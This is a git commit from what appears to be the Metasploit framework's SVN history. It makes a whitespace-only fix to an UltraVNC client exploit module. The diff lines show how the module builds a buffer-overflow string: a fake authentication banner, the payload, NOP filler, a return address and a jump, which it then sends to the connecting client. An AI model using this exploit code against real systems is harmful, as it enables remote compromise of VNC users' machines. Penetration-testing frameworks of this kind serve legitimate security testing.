fixed spacing shizzle.

git-svn-id: file:///home/svn/framework3/trunk@4205 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2006-12-14 22:46:50 +00:00
parent 529b808fc9
commit bd43475166
1 changed files with 3 additions and 3 deletions

View File

@ -59,9 +59,9 @@ class Exploits::Windows::Vnc::Ultravnc_Client < Exploit::Remote
filler = make_nops(980 - payload.encoded.length)
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
sploit << payload.encoded + filler + [target.ret].pack('V')
sploit << "PASSWORD" + [0xe8, -997].pack('CV')
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
sploit << payload.encoded + filler + [target.ret].pack('V')
sploit << "PASSWORD" + [0xe8, -997].pack('CV')
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
client.put(sploit)